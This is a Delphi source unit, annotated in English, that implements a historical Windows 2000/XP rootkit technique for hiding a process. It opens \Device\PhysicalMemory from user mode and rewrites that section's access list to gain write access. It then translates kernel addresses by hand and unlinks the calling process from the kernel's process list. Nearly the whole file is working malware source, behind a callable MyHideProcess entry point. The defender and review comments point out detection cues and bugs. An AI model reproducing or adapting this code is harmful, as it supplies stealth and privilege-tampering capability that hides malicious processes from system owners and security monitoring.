Delphi隐藏进程

// Historical user-mode DKOM sample for Windows 2000 / XP (major version 5, minor 0 or 1).
// It opens the \Device\PhysicalMemory section from user mode, widens that section's DACL
// if the open is denied, walks the 32-bit x86 page tables by hand and then patches two
// pointers inside the calling process's kernel object so it drops out of a kernel linked
// list. Everything below depends on hard-coded kernel addresses and structure offsets for
// exactly those two OS versions (OpenPhysicalMemory, YHideProcess); on any other version
// the code reports failure rather than attempting the patch. Later Windows releases no
// longer allow user-mode access to this section at all, so the version gate is also the
// ceiling of where this code can function.
// Defender notes: a user-mode process opening \Device\PhysicalMemory, rewriting the DACL of
// that section (SetSecurityInfo on an SE_KERNEL_OBJECT) and mapping views of it is a strong
// indicator on its own. Because only one list link is severed, the process remains visible
// through cross-view enumeration (handle tables, thread lists and other kernel views).
interface

function MyHideProcess: Boolean;

implementation

uses
  Windows,Classes, AclAPI, accCtrl;

type
  NTSTATUS = LongInt;

const
  //NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
  // Only STATUS_ACCESS_DENIED is referenced in this unit; the remaining constants are
  // carried over from the native headers and unused here.
  STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
  STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
  OBJ_INHERIT = $00000002;
  OBJ_PERMANENT = $00000010;
  OBJ_EXCLUSIVE = $00000020;
  OBJ_CASE_INSENSITIVE = $00000040;
  OBJ_OPENIF = $00000080;
  OBJ_OPENLINK = $00000100;
  OBJ_KERNEL_HANDLE = $00000200;
  OBJ_VALID_ATTRIBUTES = $000003F2;

type
  // IO_STATUS_BLOCK is declared but not used in this unit.
  PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
  IO_STATUS_BLOCK = record
    Status: NTSTATUS;
    FObject: DWORD;
  end;

  // Native counted UTF-16 string, filled by RtlInitUnicodeString.
  PUNICODE_STRING = ^UNICODE_STRING;
  UNICODE_STRING = record
    Length: Word;
    MaximumLength: Word;
    Buffer: PWideChar;
  end;

  // Object manager open parameters; only Length and ObjectName are set non-zero below.
  POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
  OBJECT_ATTRIBUTES = record
    Length: DWORD;
    RootDirectory: Pointer;
    ObjectName: PUNICODE_STRING;
    Attributes: DWORD;
    SecurityDescriptor: Pointer;
    SecurityQualityOfService: Pointer;
  end;

  // Signatures of the two ntdll exports resolved at run time in InitNTDLL.
  TZwOpenSection = function(SectionHandle: PHandle;
    DesiredAccess: ACCESS_MASK;
    ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
  TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
    SourceString: PWideChar); stdcall;

var
  RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
  ZwOpenSection: TZwOpenSection = nil;
  g_hNtDLL: THandle = 0;                 // ntdll module handle owned by InitNTDLL/CloseNTDLL
  g_pMapPhysicalMemory: Pointer = nil;   // view of the kernel page directory (see OpenPhysicalMemory)
  g_hMPM: THandle = 0;                   // section handle for \Device\PhysicalMemory
  g_hMPM2: THandle = 0;                  // not referenced in this unit
  g_osvi: OSVERSIONINFO;                 // filled by OpenPhysicalMemory, read again by YHideProcess
  b_hide: Boolean = false;               // cached result of the single successful hide attempt

//---------------------------------------------------------------------------
// Loads ntdll and resolves the two exports used below. Returns false only if the
// library itself fails to load.
// NOTE(review): neither GetProcAddress result is checked for nil, so a missing export
// would surface later as a call through a nil function pointer.
function InitNTDLL: Boolean;
begin
  g_hNtDLL := LoadLibrary('ntdll.dll');
  if 0 = g_hNtDLL then
  begin
    Result := false;
    Exit;
  end;
  RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
  ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');
  Result := True;
end;

//---------------------------------------------------------------------------
// Releases the ntdll handle taken by InitNTDLL; safe to call when that failed.
procedure CloseNTDLL;
begin
  if (0 <> g_hNtDLL) then
    FreeLibrary(g_hNtDLL);
  g_hNtDLL := 0;
end;

//---------------------------------------------------------------------------
// Appends one ACE granting SECTION_MAP_WRITE to the 'CURRENT_USER' trustee on the given
// section object's DACL (GetSecurityInfo -> SetEntriesInAcl -> SetSecurityInfo).
// NOTE(review): each of the three error branches frees what it holds but does not Exit,
// so after a failed call the function carries on with nil pDacl/pNewDacl; conversely the
// success path never reaches LocalFree, so pSD and pNewDacl are not released on success.
// Defender note: rewriting the DACL of a kernel section object from user mode is the most
// observable step of this technique; where object access auditing covers this section the
// WRITE_DAC access and the DACL change are both recorded.
procedure 
SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
  pDacl: PACL;
  pSD: PPSECURITY_DESCRIPTOR;
  pNewDacl: PACL;
  dwRes: DWORD;
  ea: EXPLICIT_ACCESS;
begin
  pDacl := nil;
  pSD := nil;
  pNewDacl := nil;
  dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);
  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;
  ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
  ea.grfAccessPermissions := SECTION_MAP_WRITE;
  ea.grfAccessMode := GRANT_ACCESS;
  ea.grfInheritance := NO_INHERITANCE;
  ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
  ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
  ea.Trustee.ptstrName := 'CURRENT_USER';
  dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);
  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;
  dwRes := SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);
  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;
end;

//---------------------------------------------------------------------------
// Opens \Device\PhysicalMemory for read/write and maps one page of it at the physical
// address of the kernel page directory, which is hard-coded per OS minor version
// ($30000 for 5.0, $39000 for 5.1). Any other version returns 0 without touching the
// section. Fills g_osvi and g_pMapPhysicalMemory as side effects; returns g_hMPM on
// success, 0 on failure.
// If the first open is denied, the section is reopened with READ_CONTROL or WRITE_DAC,
// its DACL is widened by SetPhyscialMemorySectionCanBeWrited, and the open is retried.
// NOTE(review): the READ_CONTROL/WRITE_DAC open is not status-checked, so g_hMPM may be
// stale when it is passed on; the hard-coded directory addresses are build-specific, so
// even a matching version number does not guarantee they are right.
function OpenPhysicalMemory: THandle;
var
  status: NTSTATUS;
  physmemString: UNICODE_STRING;
  attributes: OBJECT_ATTRIBUTES;
  PhyDirectory: DWORD;
begin
  g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
  GetVersionEx(g_osvi);
  if (5 <> g_osvi.dwMajorVersion) then
  begin
    Result := 0;
    Exit;
  end;
  case g_osvi.dwMinorVersion of
    0: PhyDirectory := $30000;
    1: PhyDirectory := $39000;
  else
    begin
      Result := 0;
      Exit;
    end;
  end;
  RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');
  attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
  attributes.RootDirectory := nil;
  attributes.ObjectName := @physmemString;
  attributes.Attributes := 0;
  attributes.SecurityDescriptor := nil;
  attributes.SecurityQualityOfService := nil;
  status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  if 
(status = STATUS_ACCESS_DENIED) then
  begin
    ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);
    CloseHandle(g_hMPM);
    status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  end;
  // NT_SUCCESS: any non-negative NTSTATUS counts as success.
  if not (LongInt(status) >= 0) then
  begin
    Result := 0;
    Exit;
  end;
  g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);
  if (g_pMapPhysicalMemory = nil) then
  begin
    Result := 0;
    Exit;
  end;
  Result := g_hMPM;
end;

//---------------------------------------------------------------------------
// Translates a kernel virtual address to a physical one by walking the classic 32-bit
// non-PAE x86 page tables (10/10/12 split) through the page directory mapped at
// BaseAddress. Bit 0 of a PDE/PTE is the present bit; bit 7 of the PDE selects a 4 MB
// page, in which case the $FFC00000/$003FFFFF masks apply directly. For 4 KB pages the
// page-table page is mapped read-only (4 = FILE_MAP_READ) and the PTE read from it.
// Returns nil when the PDE or PTE is not present.
// NOTE(review): the MapViewOfFile result for the page-table page is dereferenced without
// a nil check, and the early Exit on a non-present PTE skips UnmapViewOfFile, leaking
// that view. On a PAE kernel this translation is simply wrong.
function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
  VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
  VAddr := DWORD(addr);
  // PGDE := BaseAddress[VAddr shr 22];
  PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // modify by dot.
  if 0 = (PGDE and 1) then
  begin
    Result := nil;
    Exit;
  end;
  tmp := PGDE and $00000080;
  if (0 <> tmp) then
  begin
    PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
  end
  else
  begin
    PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
    // PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
    PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // modify by dot.
    if (0 = (PTE and 1)) then
    begin
      Result := nil;
      Exit;
    end;
    PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
    UnmapViewOfFile(Pointer(PGDE));
  end;
  Result := Pointer(PAddr);
end;

//---------------------------------------------------------------------------
// Reads one DWORD of kernel memory at virtual address addr by translating it and mapping
// the containing physical page. Returns 0 when the page cannot be mapped.
// NOTE(review): a nil result from LinearToPhys is not detected; phys becomes 0 and the
// read is served from physical page 0 instead of failing.
function GetData(addr: Pointer): DWORD;
var
  phys, ret: DWORD;
  tmp: PDWORD;
begin
  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,phys and $FFFFF000, $1000));
  if (nil = tmp) then
  begin
    Result := 0;
    Exit;
  end;
  // ret := tmp[(phys and $FFF) shr 2];
  ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // modify by dot.
  UnmapViewOfFile(tmp);
  Result := ret;
end;

// Writes one DWORD of kernel memory at virtual address addr (same mapping scheme as
// GetData, write-only view). Returns false when the page cannot be mapped.
// NOTE(review): as in GetData, a failed translation is not detected and the write would
// land in physical page 0.
function SetData(addr: Pointer; data: DWORD): Boolean;
var
  phys: DWORD;
  tmp: 
PDWORD;
begin
  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));
  if (nil = tmp) then
  begin
    Result := false;
    Exit;
  end;
  // tmp[(phys and $FFF) shr 2] := data;
  PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // modify by dot.
  UnmapViewOfFile(tmp);
  Result := TRUE;
end;

//---------------------------------------------------------------------------
// Commented-out C exception filter carried over from the original C source (terminate the
// process on any fault). It is never installed: the matching
// SetUnhandledExceptionFilter call in YHideProcess is commented out as well, so a bad
// pointer read below raises an unhandled access violation.
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
ExitProcess(0);
return 1 ;
end }
//---------------------------------------------------------------------------
// Performs the actual kernel patch. Reads the current thread object pointer from a fixed
// kernel address (labelled KTEB by the author), the owning process object from a fixed
// offset in it (KPEB), then two pointers at version-specific offsets in the process
// object ($A0/$A4 on 5.0, $88/$8C on 5.1) and rewrites them so each neighbour points at
// the other: fw+4 := bw and bw+0 := fw, consistent with a LIST_ENTRY unlink (Flink at
// +0, Blink at +4). The process's own entry is left intact, which is why it keeps running
// while disappearing from list-based enumeration. Returns true on the supported versions.
// NOTE(review): SetData return values are ignored, so a failed second write leaves the
// list half-unlinked; g_pMapPhysicalMemory is never unmapped; g_hMPM is closed here even
// though OpenPhysicalMemory owns it.
// Defender note: cross-view comparison (threads, handles, memory) still exposes the
// detached process, and the patched pointers themselves are the forensic artefact.
function YHideProcess: Boolean;
var
  thread, process: DWORD;
  fw, bw: DWORD;
begin
  // SetUnhandledExceptionFilter(exeception);
  if (FALSE = InitNTDLL) then
  begin
    Result := FALSE;
    Exit;
  end;
  if (0 = OpenPhysicalMemory) then
  begin
    Result := FALSE;
    Exit;
  end;
  thread := GetData(Pointer($FFDFF124)); //kteb
  process := GetData(Pointer(thread + $44)); //kpeb
  if (0 = g_osvi.dwMinorVersion) then
  begin
    fw := GetData(Pointer(process + $A0));
    bw := GetData(Pointer(process + $A4));
    SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);
    Result := TRUE;
  end
  else if (1 = g_osvi.dwMinorVersion) then
  begin
    fw := GetData(Pointer(process + $88));
    bw := GetData(Pointer(process + $8C));
    SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);
    Result := TRUE;
  end
  else
  begin
    Result := False;
  end;
  CloseHandle(g_hMPM);
  CloseNTDLL;
end;

// Public entry point. Runs YHideProcess at most once successfully and caches the outcome
// in b_hide; a failed attempt is retried on the next call.
function MyHideProcess: Boolean;
begin
  if not b_hide then
  begin
    b_hide := YHideProcess;
  end;
  Result := b_hide;
end;

end.